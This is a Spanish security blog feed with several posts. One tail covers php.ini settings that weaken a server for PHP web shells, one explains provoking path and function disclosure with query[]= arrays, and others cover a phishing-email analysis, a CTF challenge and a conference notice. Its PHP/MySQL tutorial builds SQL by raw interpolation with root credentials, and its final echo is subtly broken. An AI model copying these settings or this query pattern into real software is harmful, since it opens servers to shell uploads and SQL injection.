<i>Php.ini</i>:<br><br /><br><br /><div class="px"><pre width="70">register_globals = On<br />engine = On<br />safe_mode = Off<br />safe_mode_exec_dir = On<br />Safe_mode_include_dir = On</pre></div><br><br /><br><br />Para conocer un poco mas podemos leer:<br><br /><br><br />* <a href="http://www.diosdelared.com/redirect.php?go=http://www.ilegalintrusion.net/foro/index.php?topic=738.0" target="link">Tips (PhpShells) que son y como subirlas by _84kur10_</a> (Aunque ya lo puse arriba)<br><br /><br /><br><br />* Leer sobre Safe_Mode y Mod_Security en servers.<br><br /><br />Autor: Zero Bits<br><br /><br />Mail: Zero_Bits@GobiernoFederal.com<br><br /><br><br />PD: En los ultimos tutos no eh dejado mi email pero aqui esta ^^<br><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-3757868216062825198?l=www.seguridadblanca.org' alt='' /></div>Zero Bitsnoreply@blogger.com0tag:blogger.com,1999:blog-8719246101146926876.post-14401522061249756742010-01-31T08:26:00.000-08:002010-01-31T08:59:32.448-08:002010-01-31T08:59:32.448-08:00Partial Function Disclosure --> New TermEl PFD consiste en que tras introducir valores malformados podamos obtener errores de los cuales extraer la ruta y parcialmente algunas funciones usadas por la web. Cómo podemos observar el concepto es parecido al del FPD (Full Path Disclosure) y su explotación será casi la misma que el FPD pero la diferencia radica en que a la hora de explotar el bug se mostraran algunas de las funciones que son usadas por la aplicación web como se muestra a continuación en la figura.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_112F2TUuD7w/S2WwIVUUmOI/AAAAAAAAADo/2CAw9Lry92I/s1600-h/jordan.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 200px; height: 96px;" src="http://1.bp.blogspot.com/_112F2TUuD7w/S2WwIVUUmOI/AAAAAAAAADo/2CAw9Lry92I/s200/jordan.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5432942182700194018" /></a><br /><br /><br />Como vemos el bug lo estamos explotando asiendo a la variable query= en un array como se muestra en la imagen (query[]= ) lo cual aparte de mostrarnos la ruta con lo cual vendría a ser un FPD (Full Path Disclosure). Aparte se mostrarían algunas de las funciones que usa la web y la línea de código en la cual están siendo usadas lo cual vendría a ser el PFD (Partial Function Disclosure) que es el tema de este paper.<br /><br /><br />Algunos tendrán la pregunta diciendo de que sirve poder ver algunas de la funciones usadas en la aplicación web pues bueno todo nos podría ser útil para saber a que tipo de filtros pro ejemplo nos estamos enfrenta y a la vez nos vamos asiendo una idea de cómo esta programa la aplicación web y que tipo de seguridad se esta empleando.<br /><br /><br />Bueno con esto termino esta explicación de PFD (Partial Function Disclosure) <br />PFD (Partial Function Disclosure) escrito y Termino inventado por Jordan Alexander Diaz Diaz (jdiaz@aqpgrid.com)<br /><br /><br />---------------------------------<br /><br /><br />Bueno he decidido compartir esta entrada para que den su opinion de este tema, mi opinion humilde y personal es:<br /><br /><br />me es una idea original el buscar nuevos nombres pero es según yo es lo mismo que un FPD, yo no soy un experto asi que les dejo a su análisis...<br /><br />además si alguien me puede mostrar una web con FPD que no me muestre función me gustaría verla...<br /><br /><br /><br />Saludos<br />Dr.White<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-1440152206124975674?l=www.seguridadblanca.org' alt='' /></div>Dr.Whitehttp://www.blogger.com/profile/00396289618746910605noreply@blogger.com0tag:blogger.com,1999:blog-8719246101146926876.post-17171377387663311882010-01-30T22:28:00.000-08:002010-01-30T23:33:51.106-08:002010-01-30T23:33:51.106-08:00Programando: MySql y PHPya que <a href="http://xianur0.blogspot.com/">xianur0</a> me ha mostrado un bonito sistema de resaltado de código hoy he dedicido hacer un pequeño tuto de programación en PHP.<br /><br />MYSQL y PHP...<br /><br />La primera parte es declarar 4 variables... el USUARIO, PASS, HOST y BASE de DATOS<br /><br /><br />$dbhost = 'localhost'; //host normalmente localhost<br />$dbuser = 'root'; //usuario<br />$dbpass = 'password'; //contraseña<br />$dbname = 'users'; //nombre de la base de datos<br /><br /><br /><br />Bueno como ven ahí hemos asignado a variables mediante las cuales haremos la conexion a la base de datos...<br /><br />usando la función mysql_connect() haremos la conexión..<br /><br />de la siguiente manera:<br /><br /><code><br />$conexion = mysql_connect($dbhost, $dbuser, $dbpass) or die ('No hay Conexion con el host');<br /></code><br /><br /><br />Ahí hemos hecho la conexión y a la vez hemos dicho or die que quiere decir o si muere (si no conecte) mostramos el mensaje que dice ahí...<br /><br />Ahora les voy a decir como seleccionar una Base de Datos a usar...<br /><br /><code><br />mysql_select_db($dbname) or die(mysql_error());<br /></code><br /><br /><br />En el anterior code se ve que hacemos conexion o en el caso que no se pueda hacer la conexion entonces nos mostrará el error exacto... ahora les voy a decir como hacer una consulta...<br /><br /><code><br />$codigo = "123";<br />$column = "name";<br />$query="select $column from usuarios WHERE codigo=$codigo";<br />$recep = mysql_query($query);<br /></code><br /><br />bueno pues con eso ya hemos hecho la consulta, ahora solo haría falta hacerle un echo y pues nos mostraría el nombre de la persona que tenga el code 123... ahora entonces concatenemos todo el code y hagamos que muestre...<br /><br /><br /><code><br /><br />$dbhost = 'localhost'; //host normalmente localhost<br />$dbuser = 'root'; //usuario<br />$dbpass = 'password'; //contraseña<br />$dbname = 'users'; //nombre de la base de datos<br /><br />$conexion = mysql_connect($dbhost, $dbuser, $dbpass) or die ('No hay Conexion con el host');<br />mysql_select_db($dbname) or die(mysql_error());<br /><br />$codigo = "123";<br />$column = "name";<br />$query="select $column from usuarios WHERE codigo=$codigo";<br />$recep = mysql_query($query);<br /><br />echo $recep;<br /><br /></code><br /><br /><br /><br />Espero les haya gustado este mini tuto de conexiones MySql, despues avanzaremos con otro tuto de CURL() como lo prometí antes...<br /><br />PD: El sistema comenzará a servir despues...<br /><br />Saludos<br />Dr.White<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-1717137738766331188?l=www.seguridadblanca.org' alt='' /></div>Dr.Whitehttp://www.blogger.com/profile/00396289618746910605noreply@blogger.com2tag:blogger.com,1999:blog-8719246101146926876.post-49544168233421095262010-01-30T11:59:00.000-08:002010-01-30T12:44:40.371-08:002010-01-30T12:44:40.371-08:00Inteto de Hackeo de MSNBueno debo admitir que es una "buena" técnica de phishing la que han usado pero que mejor que ustedes mismos la vean, debo disculparme a su vez por estar escribiendo tan poco en el blog lo que pasa es que ando con muchos trámites por mi colegio, pero bueno ahora si primero una previa...<br /><br /><br />Bueno el Phishing Trata de que han intentado usar muchas veces mi pregunta secreta y para atacar por el lado psicológico el mail me lo envian con Advertencia 1, advertencia 2 y asi cosa que te confunden :p mm bueno algo asi se veia el mail:<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_112F2TUuD7w/S2SSyR02wgI/AAAAAAAAADI/dhRAOuaosnI/s1600-h/phishing1.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 200px; height: 22px;" src="http://2.bp.blogspot.com/_112F2TUuD7w/S2SSyR02wgI/AAAAAAAAADI/dhRAOuaosnI/s200/phishing1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5432628442991870466" /></a><br /><br /><br />mmm bueno luego si entramos vemos algo como:<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_112F2TUuD7w/S2SUK3b52QI/AAAAAAAAADQ/C4G1RD4Hhlk/s1600-h/phishing2.jpg"><img style="cursor:pointer; cursor:hand;width: 200px; height: 46px;" src="http://3.bp.blogspot.com/_112F2TUuD7w/S2SUK3b52QI/AAAAAAAAADQ/C4G1RD4Hhlk/s200/phishing2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5432629964916250882" /></a><br /><br /><br />Bueno la cosa es que ustedes si lo ven o por lo menos una persona que ve el mail lo puede creer ya que es recibido de:<br /><br />Windows Live Hotmail (member-services@live.es)<br /><br /><br />y como ven en la anterior imagen pues dice algo creible y el link se ve bastante creible pero vamos a ver algo:<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_112F2TUuD7w/S2SVLWOT0AI/AAAAAAAAADY/k6_8Bu9mRSM/s1600-h/phishing3.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 200px; height: 13px;" src="http://3.bp.blogspot.com/_112F2TUuD7w/S2SVLWOT0AI/AAAAAAAAADY/k6_8Bu9mRSM/s200/phishing3.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5432631072692359170" /></a><br /><br /><br />Eso es lo que muestra la barra del mozilla firefox cuando pongo mi mouse sobre el link... (es la barra donde dice: Esperando, Terminado, Cargando, etc, la barra inferior).<br /><br /><br />Bueno la cosa es que ahora si ya sabemos que no es del dominio de MSN que nos llega... asi que vamos a verle el código fuente al mensaje a ver que podemos ver...<br /><br /><br />Bueno como yo no marque como seguro el mensaje no se podía ver la imagen en donde muestro el mensaje pero igual les muestro la URL de la Imagen:<br /><br /><br /><code><br />&lt;p&gt;&lt;img src="http://img46.imageshack.us/img46/2883/windowslivet.png" width="175" height="23" /&gt;&lt;/p&gt;<br /></code><br /><br /><br />Miren eso... como se dan cuenta dudo mucho que hotmail use las imagenes en imageshack... quien quiera que haya hecho esto ya cometió su primer error... ahora mas código "extraño"<br /><br /><br /><code>&lt;a href="http://mailive.es/default/am9zZW56dEBob3RtYWlsLmNvbQ.html"&gt;http://mail.live.com/ppsecure/?u=am9zZW56dEBob3RtYWlsLmNvbQ==&p=aHR0cDovL3d3dy5hcHBsZS5jb20vZXMvaXBob25lLw==&id=MTcxNjQ4&lng=es&n=amFqYSBwYXJlY2Uga2Ugc29zIHZpdm8gZWg/IDpQIGJ1ZW5vIHNhbHVkb3MgYSB0dSBzZfFvcmEgOlA=&x=aXBob25l&lt;/a&gt;<br /></code><br /><br /><br />ahí está la parte clave... nos muestran un link y nos lleva a otro... y que si damos click veamos que hace nuestro navegador:<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_112F2TUuD7w/S2SXlV02MRI/AAAAAAAAADg/13TNJEdGHzw/s1600-h/phishing4.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 200px; height: 109px;" src="http://2.bp.blogspot.com/_112F2TUuD7w/S2SXlV02MRI/AAAAAAAAADg/13TNJEdGHzw/s200/phishing4.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5432633718285414674" /></a><br /><br /><br />Bueno he intentado acceder al sitio pero ni con proxy puedo acceder al parecer se los han bajado o algo por el estilo, igual que mejor ejemplo que este para que vean como son algunos que te atacan no solo con el phishing sino también por el lado psicológico dandote algunas cosas como Advertencia 1 y usar contadores para saber cuantas te van enviando...<br /><br /><br />Creo que esto también les puede servir de ayuda para sus presentaciones aquellos que quieren mostrar temas como este... espero les sirva la entrada ;)<br /><br /><br />Saludos<br />Dr.White<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-4954416823342109526?l=www.seguridadblanca.org' alt='' /></div>Dr.Whitehttp://www.blogger.com/profile/00396289618746910605noreply@blogger.com2tag:blogger.com,1999:blog-8719246101146926876.post-83820514962638724182010-01-28T14:28:00.001-08:002010-01-28T14:35:38.879-08:002010-01-28T14:35:38.879-08:00Superando el 3er Reto de Perverths0 - Http HackingBueno el Perverths0 hizo los retos de <a href="http://www.dragonjar.org">DragonJAR</a> mi team fue el team negro y fue el ganador, la próxima semana los retos serán hechos por nosotros, los pondré aquí también por si alguno de ustedes lo quería resolver...<br /><br /><br />Básicamente los retos fueron http hacking... Cambiar una cabecera cambiar el method y bueno los dos últimos eran Saber Programar y algo de Ingeniería Inversa...<br /><br /><br />La tool que usé fue BurpSuite V1.3 pero ustedes pueden usar una variante que prefieran, vean el Video y comprenderán...<br /><br /><br /><object width="400" height="225"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=8976127&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" /><embed src="http://vimeo.com/moogaloop.swf?clip_id=8976127&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="225"></embed></object><p><a href="http://vimeo.com/8976127">Resolver reto Número 3 de DragonJAR V1</a> from <a href="http://vimeo.com/user2829180">SeguridadBlanca</a> on <a href="http://vimeo.com">Vimeo</a>.</p><br /><br /><br />Bueno espero les sirva ;)<br /><br /><br />PD: Como se que si ven solo el Tercero se Perderan les dejo el link de los retos igual...<br /><a href="http://96.31.90.70/retodragonjar/retodragonjar/"><br />http://96.31.90.70/retodragonjar/retodragonjar/</a><br /><br />esos son los retos ;) diviertanse si lo quieren pasar y la web no es peligrosa osea es parte de los retos...<br /><br /><br />Saludos<br />Dr.White<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-8382051496263872418?l=www.seguridadblanca.org' alt='' /></div>Dr.Whitehttp://www.blogger.com/profile/00396289618746910605noreply@blogger.com7tag:blogger.com,1999:blog-8719246101146926876.post-73647297962470906292010-01-25T07:42:00.000-08:002010-01-25T07:49:17.462-08:002010-01-25T07:49:17.462-08:00X25 Ethical Hacking Conferences<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://i50.tinypic.com/2qi7p5u.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 300px;" src="http://i50.tinypic.com/2qi7p5u.jpg" border="0" alt="" /></a><br /><br /><br />"X.25 Ethical Hacking Conferences"<br /><br />Uno de los principales eventos en Latinoamérica relacionado con la seguridad informática.<br /><br />El "X.25 Ethical Hacking Conferences" permitirá reunir a investigadores reconocidos a nivel nacional y mundial quienes compartirán las nuevas tendencias de la seguridad informática a un nivel totalmente técnico quienes son provenientes de una gran variedad de universidades e instituciones de educación superior, organizaciones comerciales del sector público y privado e investigadores que por su propia cuenta han hecho descubrimientos en cuestión de seguridad informática se refiere.<br /><br />Este evento se dividirá en dos etapas: los talleres de Especialización enfocados a capacitar en las principales áreas de Seguridad Informática, y el ciclo de Conferencias impartidas por reconocidos expertos que serán invitados a este magno evento para compartir sus últimas investigaciones y experiencias en el área.<br /><br />Las Conferencias y los talleres de Seguridad Informática se llevarán a cabo del<br /><br />23 y 24 de Octubre del 2010<br /><br />Sede: Xalapa, Ver. México<br /><br />Si quieres mas información entra directamente a la web dando click <a href="http://x25sec.ccat.edu.mx/">aquí</a><br /><br /><br />Saludos<br />Dedalo<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-7364729796247090629?l=www.seguridadblanca.org' alt='' /></div>Dr.Whitehttp://www.blogger.com/profile/00396289618746910605noreply@blogger.com1